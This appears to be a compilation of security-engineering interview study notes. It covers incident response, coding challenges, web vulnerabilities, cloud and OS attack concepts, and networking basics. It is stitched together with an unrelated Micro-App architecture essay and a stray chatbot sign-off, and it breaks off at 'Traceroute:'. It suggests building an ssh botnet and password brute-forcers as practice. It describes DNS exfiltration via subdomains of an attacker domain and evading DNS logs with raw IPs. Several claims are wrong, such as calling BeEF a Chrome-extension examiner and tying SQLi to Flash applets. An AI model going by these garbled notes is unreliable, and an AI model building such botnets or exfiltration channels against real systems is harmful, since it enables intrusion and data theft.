Incident management is the process of responding to and resolving information security or privacy incidents when they occur. It involves a coordinated effort to detect, investigate, contain, and recover from the incident while minimizing damage to the organization.

Some key concepts and best practices in incident management include:

• Understanding the difference between privacy incidents (breaches of personal information) and information security incidents (breaches of company systems or data).

• Knowing when to involve legal, users, managers, and directors in the incident response process.

• Running through different scenarios to understand how an incident might unfold, from start to finish.

• Delegating roles and responsibilities and establishing clear lines of communication between team members.

• Identifying the type of alert triggering the incident and understanding how to find the root cause of the issue.

• Understanding the stages of an attack (such as the cyber-kill chain) and the difference between symptoms and causes.

• Building a timeline of events to identify the scope and impact of the incident.

• Assuming good intent and working collaboratively with people to resolve the issue.

• Developing response models such as SANS' PICERL (Preparation, Identification, Containment, Eradication, Recovery, Lessons learned) or Google's IMAG (Incident Management At Google) to guide the response effort.

Overall, incident management is an essential part of any organization's information security and privacy program. It involves a coordinated effort to detect, respond to, and recover from incidents while minimizing damage to the organization and protecting its assets.

Coding & Algorithms:

• The basics: This covers fundamental concepts such as conditions, loops, dictionaries, lists, arrays, string and array operations, and pseudo code.

• Data structures: This section delves into more complex data structures such as dictionaries/hash tables, arrays, stacks, SQL/tables, and Big tables.

• Sorting: Quicksort and merge sort are common algorithms used to sort data.

• Searching: This section covers binary and linear search algorithms.

• Big O: This refers to the time and space complexity of algorithms.

• Regular expressions: A powerful tool for pattern matching in strings.

• Recursion: A technique where a function calls itself to solve a problem.

• Python: A popular programming language with features such as list comprehensions, generators, slicing, regular expressions, and dynamic types. The section also compares Python to other programming languages and emphasizes the importance of understanding common functions.

Security Themed Coding Challenges:

These security-themed coding challenges provide a great opportunity for developers to practice their skills in text parsing and manipulation, basic data structures, and simple logic flows while also learning about various aspects of security engineering.

One of the challenges involves implementing a cipher that converts text to emoji or some other format, which can help developers understand how encryption works and how to implement basic ciphers. Another challenge involves parsing arbitrary logs to extract specific details such as domains, executable names, and timestamps, which can help developers understand how to handle and manipulate large amounts of data.

• Web scraping is another challenge where developers need to write a script to extract information from a website. This can be useful for gathering data for research or analysis purposes. Port scanning is also a common task in security engineering, and writing a port scanner or detecting port scanning can help developers understand how networks and ports work.

• The challenge of building an ssh botnet can help developers understand how botnets work and how to build and deploy one. Password brute-forcing is another challenge where developers need to generate credentials and store successful logins, which can help them learn about password security and common password vulnerabilities.

  Another challenge is to write a mini forensics tool to collect identifying information from PDF metadata, which can help developers understand how to extract and analyze metadata from various types of files. Recovering deleted items is another challenge where developers need to find out where deleted items are stored and write a script to pull them from local databases.

• Finally, the challenge of creating a program that looks for malware signatures in binaries and code samples can help developers understand how to detect and analyze malware and look at Yara rules for examples.

Developers are encouraged to put their work-in-progress scripts on GitHub and link them to their resume/CV, even if they are not perfect or complete, as this can demonstrate their skills and interest in security engineering.

It was my pleasure assisting you. I hope this was helpful and provided you with the information you were looking for. Don't hesitate to reach out to me if you need further assistance in the future. Have a great day!

@WarrenMu (github)

Application software is a kind of software designed for users to achieve a certain task. This is in contrast with utility or system software designed to maintain or operate the machine on which application software is running. Examples of application software could include multimedia players, social media apps, banking apps and so much more. Application software can run on different device shapes, sizes or form factors; and to capture a wider market, an application developer should consider building applications for these form factors. Traditionally we've been having mobile and desktop as the major platforms that applications can run on, but recently, we're starting to see more smatch devices such as smart watches, smart TVs, smart speakers, VR headsets and a variety of other form factors.

Problem statement

As we've introduced above, application software is software designed for the user to achieve a certain task. For example, word document applications are designed for users to work on documents and publications whereas browsers are designed to enable users to navigate the world wide web. Traditionally, applications designed for a certain platform or form factor will tend to tightly couple with that platform. For example, a developer building an application for android, iOS or windows platforms will tend to build a system so tightly coupled that it would be difficult to run that application on a different platform without significant rewriting of the code and internal infrastructure. Cases of such designs have been prevalent in the enterprise world that companies have hired huge departments to maintain code for their applications running on multiple platforms. Examples of such companies include Facebook which is currently working on evolving both its android and iOS applications.

The tightly coupled infrastructure hinders code reuse and incurs more effort to maintain thus becoming expensive to manage. Applications of such magnitude tend to be complex for new hires to work on and deploy which also exerts a heavy toll on maintenance and adding of new features

Micro-App architecture

Given the challenges that come with a tightly coupled application system. A new enterprise application software development pattern has arisen. Technically, the Micro-App architecture does not introduce any new concepts. It takes existing concepts already implemented in the micro-services and micro-kernel world and brings them to application software development.

Advantages

Micro-App architecture encourages code reuse on different application platforms. This reduces maintenance costs as you only have a single team maintaining code running on all major platforms.

It also reduces the complexity of the code as it breaks down the huge chunks of monolithic codebases into small bite-sized independent and manageable projects that can be deployed independently.

With faster deployment, businesses can now easily roll out new features for their services to customers faster and more efficiently.

Takes away the need to maintain platform-specific code which is fairly stable and shifts focus to the highly volatile business logic.

It encourages modularity and extensibility of the application. This gives an interface for other developers to extend your main application with desired functionality very easily.

Architectural overview

Micro-App architectures can be implemented in various forms. However, one major feature that categorizes this pattern is the separation of platform-specific code from the business-logic code. The point of separation is what causes variation in different patterns.

Server-driven UI (SDUI)

Server-driven UI is a Micro-App design pattern where the user interface of the application is generated by an online server. This kind of approach has been implemented by various companies including Spotify, Airbnb and the first versions of the Facebook app. The Interface is usually run as a webpage in a webview embedded in a native application. This, therefore, separates the native maintenance of the stable platform code from the volatile business logic thus allowing businesses to push changes fast. Spotify is leveraging this pattern to push new features to clients as fast as possible to keep up with market trends.

Use of Frameworks

Mobile application frameworks allow us to build the logic and interface of our applications in platform-agnostic code that can easily be deployed on all supported platforms with ease. However, to leverage more platform-specific features, frameworks should be able to provide access to the underlying platform on which the application is running. This allows the developer to configure different functionality depending on the platform.

Use of a Domain-Specific Language (DSL)

The other way to implement a Micro-App architecture is to build the native application as a Base Application, which could be also known as a Platform Application or Foundation Application written in the language of the host system (such as Kotlin/Java for Android and Swift/Objective-C for iOS). This native application could then host a runtime for a domain-specific application of your choice in which you implement the business logic. The DSL could be a language such as Lua, Python, Javascript or any other language you choose. The Platform application then exposes a set of API functions to the DSL runtime that enables the Business logic to interact with the underlying system. The business logic written in the DSL language can then be easily moved to other platforms that implement the runtime.

Use of Abstractions

If the language used to implement the business logic is the same as the language used by the underlying system, for example, if you're building an android app with both business logic and native platform code written in Java, you can abstract away access to the native platform. For example, instead of the business logic directly accessing a specific part of the UI such as a button, it can be abstracted away via an API provided by the Platform Application which will create the button for the Business Logic layer.

Conclusion

In conclusion, Micro-App architectures have the power to help you as a business competing in a fast-moving market to stay ahead of your game. It helps you reduce the number of times a client has to go to the app store to update their app just because you pushed a new change to the business logic or User Interface. It also reduces the size of your application greatly and dials down its complexity, so it's worthwhile to look into it. For a little more reading, you can find links to articles down below that I referenced in my submission.

Further reading

https://engineering.fb.com/2022/10/24/android/android-java-kotlin-migration/

https://engineering.fb.com/2023/02/06/ios/facebook-ios-app-architecture/

https://www.robosoftin.com/blog/world-of-micro-apps

https://shopify.engineering/server-driven-ui-in-shop-app

Web Applications:

• Same origin policy: This policy is a cornerstone of web security and is implemented in web browsers to prevent malicious attacks such as Cross-Site Scripting (XSS). It states that a web page loaded from one origin (e.g. example.com) cannot access resources (e.g. images, scripts, cookies) from another origin (e.g. evil.com). This is to prevent sensitive information from being leaked to unauthorized domains.

• CORS: CORS stands for Cross-Origin Resource Sharing and is a mechanism that allows a web page from one origin to make requests to another origin. This is useful for scenarios where a web page wants to access data from another domain, for example, to fetch data from a third-party API. CORS works by sending an HTTP request to the target domain with specific headers, asking the server to grant permission to access its resources. If the server allows access, it will include the necessary headers in the response to indicate that the browser can proceed with the request.

• HSTS: HSTS stands for HTTP Strict Transport Security and is a security policy that forces web browsers to only use encrypted HTTPS connections with a website that supports it. This helps to prevent eavesdropping, tampering, and man-in-the-middle attacks, as all data transmitted between the browser and the server is encrypted. HSTS is specified by the website in the form of a header sent in the HTTP response, indicating to the browser that it should only use HTTPS for all future requests to that domain.

• Cert transparency: Cert Transparency is a system that provides public transparency of SSL/TLS certificates issued by certificate authorities. It works by logging all SSL/TLS certificates issued by certificate authorities in publicly accessible logs, allowing anyone to verify the validity of the certificate. This helps to prevent certificate authority mis-issuance, which could result in fraudulent websites being granted valid SSL/TLS certificates. By checking the logs, users can verify that the certificate was indeed issued by a trusted certificate authority and has not been revoked or tampered with.

• HPKP: HTTP Public Key Pinning was a security feature that allowed a web server to specify a set of trusted public keys in an HTTP header. The browser would then only accept SSL/TLS certificates signed by one of these trusted keys. However, this feature has been deprecated by Google Chrome due to several security and privacy concerns.

• Cookies: Cookies are small text files that are stored on the client's computer by a website. They can be used to remember user preferences, store user data, or track user behavior on a website. By setting the "HttpOnly" attribute in the cookie, a website can indicate that the cookie should only be accessible by the server and not by JavaScript. This helps to prevent Cross-Site Scripting (XSS) attacks, as the attacker cannot access or steal the cookie data.

• CSRF: Cross-Site Request Forgery (CSRF) is a type of attack that allows an attacker to perform unauthorized actions on behalf of a victim, using their existing session. This can be done by tricking the victim into visiting a malicious website that sends a request to a vulnerable website, with the victim's cookies attached. The request will be executed as if it was made by the victim, leading to unintended consequences. To prevent CSRF, websites can implement various mitigation techniques, such as checking the origin of incoming requests or requiring a unique token to be submitted with each request.

• XSS: Cross-Site Scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious scripts into a web page viewed by other users. XSS attacks can take various forms, such as Reflected XSS, where the attacker's payload is immediately executed by the browser in response to a request, or Persistent XSS, where the malicious script is stored on the server and executed every time the page is viewed. There are also client-side XSS attacks, also known as DOM-based XSS, where the malicious script is executed directly by the browser without requesting the server.

• SQLi: SQL Injection (SQLi) is a type of attack that targets the database of a website by injecting malicious SQL commands into an input field, such as a search bar or a form. The attacker's goal is to manipulate the database and extract sensitive information, such as login credentials or personal data. SQLi attacks can also be performed through malicious software installed on the victim's computer, such as a person-in-the-browser (PITB) attack using a malicious Flash or Java applet. To prevent SQLi, websites must validate and sanitize user input and properly escape any special characters that might be used in an SQLi attack.

• POST: POST is one of the two main HTTP methods (the other being GET) used to send data from a client to a server. The POST method is typically used to submit form data, as it can transmit large amounts of data and is more secure than GET, as the data is not visible in the URL.

• GET: GET is the other main HTTP method used to retrieve data from a server. The GET method sends a request to the server with query parameters attached to the URL, which can be used to specify the data that should be returned. Unlike POST, the data sent with a GET request is visible in the URL and has a limit on the amount of data that can be sent.

• Directory traversal: Directory traversal, also known as path traversal, is a type of security vulnerability that allows an attacker to access files and directories on a server that they should not be able to see. This can be done by injecting ../ or ./ into a URL or a form field, which causes the server to traverse the file system to a different directory than intended. There are various tools available that automate directory traversal attacks.

• APIs: An API (Application Programming Interface) is a set of rules that allows different software systems to communicate with each other. APIs can return various types of information, such as data, images, or status codes, and can also receive data, such as parameters or authentication credentials. When working with APIs, it's important to understand what information they return and what data can be sent, as this can have security implications.

• Beefhook: Beefhook is a tool used to examine the behavior of Chrome extensions, including the data they access and the requests they make. This can be useful for security purposes, as it allows researchers and developers to identify potential security vulnerabilities in extensions.

• User agents: A user agent is a string sent by a client to a server that identifies the type of client and the software used. The user agent can be used to determine if the client is a legitimate browser or a bot, as bots typically have unique user agents that can be easily recognized.

• Browser extension take-overs: A browser extension take-over occurs when an attacker can install a malicious extension in a browser, either by exploiting a security vulnerability or by tricking the user into installing it. Malicious extensions can perform various malicious activities, such as mining cryptocurrency, stealing login credentials, or displaying unwanted ads.

• Local file inclusion: Local file inclusion (LFI) is a type of security vulnerability that allows an attacker to include and execute local files on the server. This can be done by injecting malicious file paths into a URL or a form field, allowing the attacker to execute arbitrary code on the server.

• Remote file inclusion (RFI): Remote file inclusion (RFI) is a type of security vulnerability that allows an attacker to include and execute remote files on the server. This can be done by injecting a URL into a form field or a parameter, causing the server to retrieve and execute the remote file. RFI attacks are less common these days due to improved security measures and the decline in popularity of certain programming languages, such as PHP.

• SSRF: Server-Side Request Forgery (SSRF) is a type of security vulnerability that allows an attacker to send a malicious request from a vulnerable server to another server. This can be used to access restricted resources on the target server, such as internal network resources or local files.

• Web vulnerability scanners: Web vulnerability scanners are tools that automate the process of identifying security vulnerabilities in web applications. These tools can identify a wide range of security issues, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF).

• SQLmap: SQLmap is an open-source tool used to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications. It can be used to retrieve data from databases, execute arbitrary SQL commands, and even take full control of the underlying server.

• Malicious redirects: A malicious redirect is a type of attack in which a user is redirected to a different website without their knowledge or consent. This can be done by injecting malicious code into a vulnerable website or by using a phishing technique, such as a fake login page. Malicious redirects can be used to steal sensitive information, such as login credentials, or to distribute malware.

Infrastructure (Prod / Cloud) Virtualisation:

Infrastructure (Prod / Cloud) Virtualisation is the process of creating and managing virtual versions of physical resources, such as servers, storage, and networking. This technology enables multiple virtual systems to run on a single physical host, increasing efficiency, scalability, and security.

Cloud virtualization specifically refers to virtualization in cloud computing environments, where cloud providers offer virtual resources as a service over the internet. This allows organizations to run their applications and store their data in virtual environments provided by the cloud provider, rather than on physical hardware they own and maintain.

• Hypervisors: A hypervisor is a type of virtualization technology that allows multiple virtual machines (VMs) to run on a single physical host. The hypervisor provides a layer of abstraction between the physical host and the virtual machines, allowing each VM to run its operating system and applications independently.

• Hyperjacking: Hyperjacking refers to the act of compromising a hypervisor and gaining unauthorized access to its virtual machines. This type of attack can allow an attacker to steal sensitive information or compromise multiple VMs at once.

• Containers, VMs, clusters: Containers, virtual machines (VMs), and clusters are different types of virtualization technologies. Containers are a lightweight form of virtualization that provide isolation between applications without the overhead of a full virtual machine. VMs are a traditional form of virtualization that allows multiple operating systems to run on a single physical host. Clusters are a group of interconnected VMs that work together to provide high availability and scalability.

• Escaping techniques: Escaping techniques refer to methods used by attackers to escape from a virtualized environment and access the underlying physical host. This can be used to steal sensitive information or compromise the host system.

• Lateral movement and privilege escalation techniques: Lateral movement and privilege escalation are tactics used by attackers to move from one system to another and gain elevated privileges. In cloud environments, cloud service accounts can be used for lateral movement and privilege escalation. GCPloit is a tool for exploiting vulnerabilities in Google Cloud Projects.

• Site isolation: Site isolation is a security technique that separates different parts of a website into separate sandboxes. This helps to prevent cross-site scripting (XSS) and other types of attacks that could allow an attacker to access sensitive information.

• Side-channel attacks: Side-channel attacks refer to attacks that exploit information that is leaked through the side channels of a system, such as power consumption or electromagnetic radiation. Spectre and Meltdown are examples of side-channel attacks that exploit weaknesses in modern processors.

• BeyondCorp: BeyondCorp is a security model that is designed to trust the device (such as a laptop or smartphone) but not the network. This allows organizations to provide secure access to resources from anywhere, without the need for a traditional VPN.

• Log4j vulnerability: The Log4j vulnerability is a security vulnerability in the Log4j logging framework that can be exploited by attackers to inject malicious code into Java applications. This vulnerability can lead to remote code execution, data theft, and other types of attacks.

OS Implementation and Systems:

• OS Implementation and Systems refer to how an operating system is implemented and the various systems and components that make it up.

  Privilege escalation techniques: Techniques used by attackers to increase their level of access and control over a system, such as exploiting vulnerabilities, misconfigurations, or weak passwords.

  Buffer Overflows: A type of software vulnerability where an attacker can cause a program to crash or execute unintended code by sending more data to a buffer than it can handle.

  Directory traversal: An attack where an attacker manipulates file paths in a request to access files and directories that are outside of the intended directory structure.

  Remote Code Execution: A type of attack where an attacker can execute arbitrary code on a remote system. This is often achieved through exploiting software vulnerabilities or weak configurations.

  Local databases: Databases that are stored locally on a device, rather than on a remote server. For example, some messaging apps use SQLite for storing messages.

  Windows: A popular operating system used by many organizations and individuals.

  Windows registry: A database that stores configuration settings and options for the Windows operating system and its applications.

  Group Policy: A feature in Windows that allows administrators to set policies for users and computers in an Active Directory environment.

  Active Directory (AD): A centralized database used by Windows to store user, computer, and network information.

  Bloodhound tool: A tool used to visualize and analyze the relationships and privileges within an Active Directory environment.

  Kerberos authentication with AD: A network authentication protocol used by Windows to provide secure authentication over unsecured networks.

  Windows SMB: The Server Message Block protocol used by Windows for file and print sharing.

  Samba: A free, open-source implementation of the SMB protocol that allows non-Windows systems to share files and printers with Windows systems.

  ROP: Return-Oriented Programming, a type of attack that exploits buffer overflows by chaining together small fragments of code, rather than injecting new code into a buffer.

• *nix refers to Unix-like operating systems, including Linux and Unix.

  SELinux is a security extension for Linux, which provides mandatory access control policies to the operating system.

  The kernel in nix operating systems is the central component of the operating system that manages system resources and communicates with the hardware. Userspace is the portion of the operating system where applications and user-level processes run. Permissions are used to control access to resources in nix systems, such as files and directories.

  MAC (Mandatory Access Control) is a type of access control where the system enforces rules for accessing resources, whereas DAC (Discretionary Access Control) allows users to set their own access rules for resources.

  /proc is a virtual file system in nix operating systems, which provides information about system processes. /tmp is a directory in the nix operating system used for the temporary storage of files, and code can be saved and executed from there. /shadow contains encrypted passwords for user accounts.

  LDAP (Lightweight Directory Access Protocol) is a protocol used for accessing and maintaining directory information services over an Internet Protocol network. It allows users to have a single password for multiple services, similar to Active Directory in Windows.

  MacOS is an operating system for Apple Macintosh computers. The Gotofail error was a bug in the SSL/TLS cryptographic software library in MacOS, which allowed attackers to intercept secure communications between two parties. MacSweeper was a software tool used for cleaning up junk files on MacOS. Researching Mac vulnerabilities involves identifying security weaknesses and flaws in the MacOS operating system and finding ways to fix them.

Welcome back. let's seize the moment!

Let's look at firewalls.

What are firewalls?

• A firewall is a network security system that monitors and controls the incoming and outgoing network traffic based on predetermined security rules and policies. The main purpose of a firewall is to prevent unauthorized access to or from a private network and to block malicious or unwanted traffic. Firewalls can be hardware-based or software-based and are commonly used to protect networks connected to the internet.

Rules to prevent incoming and outgoing connections:

Firewall rules are used to control incoming and outgoing network traffic based on predefined criteria such as IP address, port number, protocol, and other parameters. These rules can be used to:

• Block incoming traffic from certain IP addresses or ranges. Allow incoming traffic only from specific IP addresses or ranges.

• Block incoming traffic on certain ports.

• Allow incoming traffic only on specific ports.

• Block outgoing traffic to certain IP addresses or ranges.

• Allow outgoing traffic only to specific IP addresses or ranges.

• Block outgoing traffic on certain ports.

• Allow outgoing traffic only on specific ports.

• Inspect and filter traffic based on protocol, such as HTTP or HTTPS.

• Inspect and filter traffic based on application layer data, such as file types or keywords.

  The rules are applied to the firewall in a specific order, and the firewall evaluates each packet of incoming and outgoing network traffic against the rules in that order. If a packet matches one of the rules, the firewall will take the action specified in that rule, such as allowing or blocking the traffic.

The specific code for configuring firewall rules will depend on the software or hardware firewall you are using. Here are some examples of firewall rule configurations for different platforms:

IPTables (Linux):

iptables -A INPUT -s 192.168.1.0/24 -j DROP

This command will block all incoming traffic from the IP address range 192.168.1.0 to 192.168.1.255

iptables -A OUTPUT -d 10.0.0.0/8 -j DROP

This command will block all outgoing traffic to the IP address range 10.0.0.0 to 10.255.255.255

Windows Firewall (Windows):

netsh advfirewall firewall add rule name="Block incoming traffic from 192.168.1.0/24" dir=in remoteip=192.168.1.0/24 action=block

This command will block all incoming traffic from the IP address range 192.168.1.0 to 192.168.1.255

netsh advfirewall firewall add rule name="Allow outgoing traffic to 10.0.0.0/8" dir=out remoteip=10.0.0.0/8 action=allow

This command will allow all outgoing traffic to the IP address range 10.0.0.0 to 10.255.255.255

pf (FreeBSD, OpenBSD):

block in quick on $ext_if from 192.168.1.0/24

This command will block all incoming traffic from the IP address range 192.168.1.0 to 192.168.1.255

block out quick on $ext_if to 10.0.0.0/8

This command will block all outgoing traffic to the IP address range 10.0.0.0 to 10.255.255.255

Note:

Please note that the above commands are examples and might not work in your specific environment.

That's it for firewalls. let's dive into NAT (Network Addressing Table)

NAT (Network Address Translation):

• is a method of remapping one IP address space into another by modifying network address information in the IP header of packets while they are in transit across a traffic routing device. The technique was originally used for ease of rerouting traffic in IP networks without readdressing every host.

• NAT operates on a router, usually connecting two networks, and translates the private (not globally unique) addresses in the internal network into legal addresses, e.g. Internet Protocol (IP) addresses, on the external network (the Internet). This allows computers on a private network to communicate with the Internet as if they had a globally unique IP address, while still maintaining the benefits of a private network (for example, security, addressing, and so on).

• NAT is typically used to allow multiple hosts on a private network to access the Internet using a single public IP address, which is typically assigned by an Internet Service Provider (ISP) to the router. This is often used in home and small office networks, where obtaining a block of public IP addresses would be impractical or too costly.

• NAT can also be used for other purposes, such as load balancing or connecting multiple networks. Additionally, NAT can be implemented on a host, rather than a router, allowing a single host to communicate with the Internet using a different IP address than its own.

• IPv4 and IPv6 are the two versions of Internet Protocol (IP) in use today.

  IPv4, the first version of IP, was first implemented in the early 1980s and has a 32-bit address space, which allows for a total of about 4.3 billion unique addresses. This address space is rapidly being exhausted as more and more devices are connected to the Internet. To solve this problem, IPv6 was developed, which has a 128-bit address space, allowing for a total of about 3.4 x 10^38 unique addresses.

• One of the main differences between IPv4 and IPv6 is the size of the addresses. IPv4 addresses are 32 bits long, written in dot-decimal notation (for example, 192.168.1.1), while IPv6 addresses are 128 bits long, written in hexadecimal notation (for example, 2001:0db8:85a3:0000:0000:8a2e:0370:7334).

• This larger address space in IPv6 allows for many more unique addresses and eliminates the need for NAT (Network Address Translation) which is used to map multiple private IP addresses to a single public IP address.

  Another difference is that IPv6 uses a simplified header format compared to IPv4. This allows for faster packet processing and more efficient routing. IPv6 also has built-in support for IPsec (Internet Protocol Security), which is an optional feature in IPv4. IPv6 also includes support for multicast (one-to-many) and anycast (one-to-nearest) addressing, which allows for more efficient communication in certain situations.

• In summary, IPv4 and IPv6 are different versions of Internet Protocol, IPv4 is the first version that has a 32-bit address space which is becoming scarce, IPv6 was developed as a solution to this problem by having a 128-bit address space, simplified header format and built-in support for IPsec, multicast and anycast addressing

DNS:

• DNS (Domain Name System) is a hierarchical, decentralized system for naming and addressing Internet resources. It is used to translate human-friendly domain names, such as www.example.com, into IP addresses that machines can understand, such as 192.0.2.1. This makes it easier for users to access Internet resources, as they can remember and type in domain names instead of IP addresses.

• DNS is organized into a hierarchical tree-like structure, with the root of the tree at the top. The root is the highest-level domain and is not associated with any specific organization or country. It has a number of top-level domains (TLDs) such as .com, .org, .edu, .gov, and country-code TLDs (ccTLDs) such as .us, .uk, .fr, etc. Each TLD is managed by a separate organization, known as a registry.

• Underneath the TLDs, there are second-level domains, such as example.com. These are typically registered by organizations or individuals and can be further divided into subdomains, such as www.example.com.

  The process of resolving a domain name to an IP address is handled by DNS servers, which are responsible for maintaining a database of domain names and their corresponding IP addresses. When a user requests a specific domain name, their computer sends a query to a DNS server, which then looks up the IP address associated with that domain name and returns it to the user's computer.

• DNS is a critical infrastructure for the internet and it's usually used for name resolution for websites, email and other services. Without DNS, users would have to manually enter IP addresses every time they wanted to access a website or other online resource, which would be impractical and time-consuming.

(53):

• The number 53 refers to the port number used by the Domain Name System (DNS) protocol. DNS uses the User Datagram Protocol (UDP) on port 53 to serve DNS queries. When a computer needs to resolve a hostname to an IP address, it sends a DNS query to a DNS server on port 53. The DNS server then responds with the requested IP address or with a referral to another DNS server that may have more information.

• Port 53 is a well-known port, which means it is a registered port that is commonly used by DNS. As such, firewalls and other security devices are often configured to allow traffic to and from this port.

• It's important to note that DNS can also use TCP port 53 when the response size is too large to fit in a single UDP packet and the client supports TCP.

  Since DNS is a fundamental infrastructure for the internet, it is important to have DNS servers running on port 53, to ensure that domain names can be resolved to IP addresses and internet services can be accessed.

Note:

Requests to DNS are usually UDP unless the server gives a redirect notice asking for a TCP connection. Look-up in the cache happens first. DNS exfiltration. Using raw IP addresses means no DNS logs, but there are HTTP logs. DNS sinkholes.

DNS requests are usually sent using the User Datagram Protocol (UDP) on port 53, but in some cases, if the DNS server responds with a "Truncated" flag, indicating that the response is too large to fit in a single UDP packet, the client may switch to using the Transmission Control Protocol (TCP) on port 53 to continue the transaction.

When a DNS query is made, the client will first check its local cache to see if it already has the requested information. If the information is not in the cache, the client will send a query to a DNS server. The DNS server will then check its cache and, if necessary, will forward the query to other DNS servers until it gets a response.

DNS exfiltration is a technique used to covertly exfiltrate data from a network by encoding it in DNS queries and responses. This can be done by using a domain name that looks like a normal domain name but is controlled by the attacker. The attacker can then use this domain name to send and receive data in a way that is difficult to detect.

Using raw IP addresses instead of domain names to access websites or other online resources can help evade detection by DNS logs. However, it is important to note that there are other types of logs, such as HTTP logs, that can still be used to track activity.

DNS sinkholes, also known as blackholes, are a security measure used to block access to malicious or unwanted domain names by redirecting DNS queries for those domain names to a non-existent IP address. This effectively prevents the client from reaching the domain name and can be used to block access to phishing sites, malware-hosting sites, and other types of malicious domains.

In a reverse DNS lookup, PTR might contain- 2.152.80.208.in-addr.arpa, which will map to 208.80.152.2. DNS lookups start at the end of the string and work backwards, which is why the IP address is backwards in PTR.

A reverse DNS lookup, also known as a PTR (pointer) record lookup, is the process of looking up the hostname associated with a given IP address. The PTR record is used to map an IP address to a hostname and is stored in a special domain called in-addr.arpa.

In a reverse DNS lookup, the IP address is reversed and appended with "in-addr.arpa" to form the domain name used in the lookup. For example, a reverse DNS lookup for the IP address 208.80.152.2 would use the domain name 2.152.80.208.in-addr.arpa.

The reason the IP address is reversed in PTR is because the in-addr.arpa domain is organized hierarchically, with the octets of the IP address being used to form the labels of the domain name in reverse order. This allows the DNS system to perform lookups in a hierarchical manner, starting at the root of the tree and working down to the specific PTR record.

It's important to note that not all IP addresses have a corresponding PTR record and a reverse DNS lookup may return a negative response.

DNS exfiltration:

• DNS exfiltration is a technique used to covertly exfiltrate data from a network by encoding it in DNS queries and responses. One way this can be done is by sending data as subdomains of a domain name controlled by the attacker. For example, an attacker could encode data in a subdomain such as 26856485f6476a567567c6576e678.badguy.com. This can be difficult to detect as it does not show up in HTTP logs and may not be flagged as suspicious by security systems that are not specifically looking for this type of activity.

• Another way to do this could be by using a domain name that looks like a normal domain name but is controlled by the attacker. The attacker can then use this domain name to send and receive data in a way that is difficult to detect.

• It's important to note that DNS exfiltration is a highly advanced and sophisticated attack method that requires a deep understanding of the DNS protocol and the ability to encode and decode data in a way that is not easily detectable. The use of this method requires a lot of stealth, as it is a well-known technique used by attackers to evade detection.

• It is important to have good security systems and monitoring in place to detect and prevent this type of attack, such as using software that can detect abnormal DNS traffic. Additionally, keeping the DNS servers and the software up-to-date and patching vulnerabilities promptly is also important.

DNS configs:

• Start of Authority (SOA).

• IP addresses (A and AAAA).

• SMTP mail exchangers (MX).

• Name servers (NS).

• Pointers for reverse DNS lookups (PTR).

• Domain name aliases (CNAME).

are several types of DNS configuration records that are used to configure and manage a domain name:

1. Start of Authority (SOA) - This record is used to define the primary DNS server for a domain, as well as other information such as the administrative contact and the serial number of the zone file.

2. IP addresses (A and AAAA) - These records are used to map a hostname to an IPv4 or IPv6 address respectively.

3. SMTP mail exchangers (MX) - These records are used to identify the mail servers for a domain so that email can be delivered to the correct server.

4. Name servers (NS) - These records are used to identify the DNS servers that are responsible for a domain so that DNS queries can be forwarded to the correct server.

5. Pointers for reverse DNS lookups (PTR) - These records are used to map an IP address to a hostname in a reverse DNS lookup.

6. Domain name aliases (CNAME) - These records are used to create an alias for a hostname so that multiple hostnames can resolve to the same IP address.

These are the most common DNS configurations, but there are other types of records as well, such as SRV, TXT and others that can be used for specific purposes.

It is important to note that DNS configurations can be complex and require a good understanding of the DNS protocol and the specific needs of the domain. Misconfiguring DNS records can cause problems such as email delivery failures, web server failures, or even complete loss of internet access.

ARP (Address Resolution Protocol):

• is a protocol used to map a network layer protocol address (such as an IP address) to a link layer (MAC) address on a local network. ARP is used to determine the link-layer (MAC) address corresponding to a given network-layer (IP) address, and it is typically used when a host wants to communicate with another host on a LAN.

• When a host wants to communicate with another host on a LAN, it needs to know the MAC address of the destination host. It does this by broadcasting an ARP request message, which contains the IP address of the destination host, to all devices on the LAN. The device with the matching IP address responds with its MAC address, which is then used by the sender to send the data.

• It's important to note that ARP is a broadcast protocol and it is not authenticated, which means that it can be subject to ARP spoofing attacks, where an attacker sends fake ARP messages to map its own MAC address to the IP address of another device on the network, allowing the attacker to intercept and possibly modify network traffic. To prevent this, techniques such as static ARP entries, ARP protection and DHCP snooping can be used.

DHCP (Dynamic Host Configuration Protocol):

• is a network protocol used to dynamically assign IP addresses, subnet masks, default gateways, and other network configuration parameters to devices on a network. It operates over UDP (User Datagram Protocol) on ports 67 and 68. DHCP allows devices to automatically obtain IP addresses and other network configuration information, eliminating the need for manual configuration.

• When a device wants to obtain an IP address, it sends a broadcast message called DHCPDISCOVER to the network, asking for an available IP address. The DHCP server, which is typically a router or a dedicated DHCP server, receives the DHCPDISCOVER message and responds with a DHCPOFFER message, which contains an available IP address and other network configuration information.

• The device then sends a DHCPREQUEST message to the DHCP server, requesting the offered IP address. The DHCP server then sends a DHCPACK message to the device, confirming that the IP address has been assigned to the device.

• It's important to note that DHCP also has several other message types like DHCPNAK, DHCPRELEASE, DHCPINFORM, and DHCPFORCERENEW which are used for specific purposes like indicating that an IP address is not available, releasing an IP address or renewing an IP address.

• DHCP is widely used in networks to automatically configure IP addresses for devices, which is useful for networks that have a high turnover of devices or for devices that are not easily configured manually. However, DHCP can also be subject to DHCP spoofing attacks, where an attacker sends fake DHCPOFFER messages to assign a rogue IP address to a device, which can be mitigated by using DHCP snooping.

Multiplex:

• Multiplexing is the process of simultaneously transmitting multiple signals over a single communication channel. There are several types of multiplexing techniques, including:

  1. Time-division multiplexing (TDM) - In TDM, each signal is assigned a specific time slot within a larger time frame, and the time slots are used to transmit each signal in turn. This allows multiple signals to be transmitted over a single channel, by effectively "sharing" the channel over time.

  2. Frequency-division multiplexing (FDM) - In FDM, each signal is assigned a specific frequency band within a larger frequency range, and the frequency bands are used to transmit each signal simultaneously. This allows multiple signals to be transmitted over a single channel, by effectively "sharing" the channel over frequency.

  3. Statistical multiplexing - In statistical multiplexing, the channel capacity is adaptively shared among multiple signals, based on the instantaneous demand of each signal. This allows the channel to be used more efficiently, as the capacity is allocated to the signals that need it most.

  4. Code-division multiplexing (CDM) - In CDM, each signal is assigned a unique code and all signals are transmitted simultaneously over the same channel by using the unique codes to distinguish the signals from one another.

These are the most common types of multiplexing, but there are other types as well. It's important to note that multiplexing can be useful in a variety of contexts, such as telecommunications, computer networks, and other applications where multiple signals need to be transmitted over a single channel.

Traceroute:

